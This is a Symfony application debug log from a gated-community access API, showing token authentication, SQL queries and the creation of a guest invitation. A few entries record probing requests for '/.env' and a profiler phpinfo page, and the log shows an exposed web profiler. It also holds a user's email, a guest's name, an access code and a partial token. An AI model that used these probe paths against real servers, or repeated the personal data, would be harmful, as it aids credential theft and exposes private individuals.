[2025-12-21 00:51:15] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:51:15] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:51:15] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:51:15] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:51:15] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:51:15] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:51:15] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:51:15] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:51:15] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
[2025-12-21 00:51:15] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 00:51:15] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"572e256f-5aca-4b44-bfb4-61 [...]","2":1,"3":"2025-12-21 00:51:15","4":"2025-12-21 00:51:15","5":"Jorge","6":"RodrÃguez","7":"320660","8":"/invitation/39923f13647556 [...]","9":"2","10":"1","11":"2025-12-21 19:30:00","12":null,"13":null,"14":null,"15":274,"16":398} []
[2025-12-21 00:51:15] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
[2025-12-21 00:51:15] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:51:15] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
[2025-12-21 00:51:15] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:51:15] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:51:15] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:51:15] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:51:15] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:51:15] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:51:15] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:51:15] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:51:15] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:51:15] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:51:15] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:52:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:53:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1702ec","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/1702ec?panel=time","method":"GET"} []
[2025-12-21 00:53:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-21 00:53:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:53:45] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-21 00:53:52] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 00:53:52] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:53:52] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:53:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:53:52] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:53:52] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:53:52] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:53:52] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:53:52] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:53:52] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:53:52] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:53:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:53:52] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:53:52] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:53:52] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:53:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:53:52] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:53:52] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:53:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:53:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:53:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-21 00:53:52] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:56:12] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 00:56:12] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:56:12] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:56:12] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:56:12] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:56:12] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:56:12] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:56:12] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:56:12] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:56:12] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:56:12] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:56:12] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:56:12] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:56:12] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:56:12] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:56:12] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:56:12] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:56:12] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:56:12] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:56:12] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:56:12] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-21 00:56:12] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:56:15] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
